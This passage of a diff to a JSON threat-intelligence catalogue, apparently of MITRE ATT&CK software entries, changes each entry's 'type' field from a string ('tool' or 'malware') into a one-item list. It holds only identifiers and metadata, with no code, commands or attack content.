"303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4868,7 +5138,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -4902,7 +5174,9 @@ "992bdd33-4a47-495d-883a-58010a2f0efb", "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5044,7 +5318,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5066,7 +5342,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5106,7 +5384,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5125,7 +5405,9 @@ ], "software_attack_id": "S0369", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5166,7 +5448,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5185,7 +5469,9 @@ ], "software_attack_id": "S0244", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5207,7 +5493,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5258,7 +5546,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5313,7 +5603,9 @@ ], "software_attack_id": "S0608", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5362,7 +5654,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5403,7 +5697,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5450,7 +5746,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5504,7 +5802,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5553,7 +5853,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5572,7 +5874,9 @@ ], "software_attack_id": "S0492", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5594,7 +5898,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5639,7 +5945,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5689,7 +5997,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5765,7 +6075,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5800,7 +6112,9 @@ ], "software_attack_id": "S0614", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5878,7 +6192,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -5920,7 +6236,9 @@ "tags": [ "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -5977,7 +6295,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6001,7 +6321,9 @@ "904ad11a-20ca-479c-ad72-74bd5d9dc7e4", "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6021,7 +6343,9 @@ ], "software_attack_id": "S1023", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6044,7 +6368,9 @@ ], "software_attack_id": "S1024", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6084,7 +6410,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6113,7 +6441,9 @@ ], "software_attack_id": "S0235", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6136,7 +6466,9 @@ ], "software_attack_id": "S0538", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6159,7 +6491,9 @@ ], "software_attack_id": "S0498", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6204,7 +6538,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6249,7 +6585,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6290,7 +6628,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6309,7 +6649,9 @@ ], "software_attack_id": "S0527", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6345,7 +6687,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6386,7 +6730,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6409,7 +6755,9 @@ "b20e7912-6a8d-46e3-8e13-9a3fc4813852", "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6434,7 +6782,9 @@ ], "software_attack_id": "S0497", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6460,7 +6810,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6542,7 +6894,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6593,7 +6947,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6612,7 +6968,9 @@ ], "software_attack_id": "S1066", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6634,7 +6992,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6681,7 +7041,9 @@ ], "software_attack_id": "S0187", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6734,7 +7096,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6757,7 +7121,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6777,7 +7143,9 @@ "meta": { "software_attack_id": "S0255", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6831,7 +7199,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6861,7 +7231,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6888,7 +7260,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -6929,7 +7303,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6959,7 +7335,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -6981,7 +7359,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7022,7 +7402,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7083,7 +7465,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7124,7 +7508,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7165,7 +7551,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7206,7 +7594,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7246,7 +7636,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7286,7 +7678,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7310,7 +7704,9 @@ "a98d7a43-f227-478e-81de-e7299639a355", "311abf64-a9cc-4c6a-b778-32c5df5658be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [], "uuid": "ff0b0792-5dd0-4e10-8b84-8da93a0198aa", @@ -7346,7 +7742,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7387,7 +7785,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7428,7 +7828,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7451,7 +7853,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7470,7 +7874,9 @@ ], "software_attack_id": "S0200", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7493,7 +7899,9 @@ ], "software_attack_id": "S1088", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7537,7 +7945,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7583,7 +7993,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7610,7 +8022,9 @@ ], "software_attack_id": "S1021", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7654,7 +8068,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7676,7 +8092,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7713,7 +8131,9 @@ ], "software_attack_id": "S0281", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7740,7 +8160,9 @@ "tags": [ "efa33611-88a5-40ba-9bc4-3d85c6c8819b" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7759,7 +8181,9 @@ ], "software_attack_id": "S0695", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7804,7 +8228,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -7840,7 +8266,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7870,7 +8298,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7893,7 +8323,9 @@ ], "software_attack_id": "S0186", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7916,7 +8348,9 @@ ], "software_attack_id": "S0694", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7952,7 +8386,9 @@ "tags": [ "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -7983,7 +8419,9 @@ ], "software_attack_id": "S0547", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8011,7 +8449,9 @@ "1efd43ee-5752-49f2-99fe-e3441f126b00", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8055,7 +8495,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8092,7 +8534,9 @@ "cb3d30b3-8cfc-4202-8615-58a9b8f7f118", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8126,7 +8570,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8171,7 +8617,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8212,7 +8660,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8231,7 +8681,9 @@ ], "software_attack_id": "S0038", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8267,7 +8719,9 @@ "tags": [ "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8316,7 +8770,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8363,7 +8819,9 @@ ], "software_attack_id": "S0024", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8404,7 +8862,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8427,7 +8887,9 @@ ], "software_attack_id": "S0377", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8450,7 +8912,9 @@ ], "software_attack_id": "S0593", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8519,7 +8983,9 @@ ], "software_attack_id": "S0624", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8560,7 +9026,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8597,7 +9065,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8651,7 +9121,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8682,7 +9154,9 @@ ], "software_attack_id": "S0064", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8705,7 +9179,9 @@ ], "software_attack_id": "S0082", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8747,7 +9223,9 @@ "84615fe0-c2a5-4e07-8957-78ebc29b4635", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8814,7 +9292,9 @@ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f", "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -8912,7 +9392,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -8994,7 +9476,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9052,7 +9536,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9105,7 +9591,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9124,7 +9612,9 @@ ], "software_attack_id": "S0396", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9147,7 +9637,9 @@ "tags": [ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9173,7 +9665,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9199,7 +9693,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9222,7 +9718,9 @@ ], "software_attack_id": "S0401", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9245,7 +9743,9 @@ ], "software_attack_id": "S0343", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9289,7 +9789,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9312,7 +9814,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9352,7 +9856,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9396,7 +9902,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9423,7 +9931,9 @@ ], "software_attack_id": "S0569", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9468,7 +9978,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9498,7 +10010,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9539,7 +10053,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9558,7 +10074,9 @@ ], "software_attack_id": "S0076", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9581,7 +10099,9 @@ ], "software_attack_id": "S0181", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9607,7 +10127,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9630,7 +10152,9 @@ ], "software_attack_id": "S0171", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9667,7 +10191,9 @@ ], "software_attack_id": "S0267", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9690,7 +10216,9 @@ ], "software_attack_id": "S0679", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9713,7 +10241,9 @@ ], "software_attack_id": "S0120", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9743,7 +10273,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9766,7 +10298,9 @@ ], "software_attack_id": "S0355", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9811,7 +10345,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9853,7 +10389,9 @@ ], "software_attack_id": "S0182", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9902,7 +10440,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -9927,7 +10467,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -9953,7 +10495,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10004,7 +10548,9 @@ ], "software_attack_id": "S0143", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10031,7 +10577,9 @@ ], "software_attack_id": "S0036", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10057,7 +10605,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10122,7 +10672,9 @@ "84615fe0-c2a5-4e07-8957-78ebc29b4635", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10174,7 +10726,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10201,7 +10755,9 @@ ], "software_attack_id": "S0173", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10246,7 +10802,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10268,7 +10826,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10309,7 +10869,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10351,7 +10913,9 @@ "meta": { "software_attack_id": "S0503", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10390,7 +10954,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10409,7 +10975,9 @@ ], "software_attack_id": "S0277", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10450,7 +11018,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10499,7 +11069,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10540,7 +11112,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10581,7 +11155,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10627,7 +11203,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10660,7 +11238,9 @@ ], "software_attack_id": "S0628", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10690,7 +11270,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10730,7 +11312,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10799,7 +11383,9 @@ ], "software_attack_id": "S0666", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10830,7 +11416,9 @@ ], "software_attack_id": "S0049", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10856,7 +11444,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -10900,7 +11490,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -10951,7 +11543,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11028,7 +11622,9 @@ ], "software_attack_id": "S0026", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11066,7 +11662,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -11089,7 +11687,9 @@ ], "software_attack_id": "S0249", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11115,7 +11715,9 @@ "tags": [ "f2ae2283-f94d-4f8f-bbde-43f2bed66c55" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -11134,7 +11736,9 @@ ], "software_attack_id": 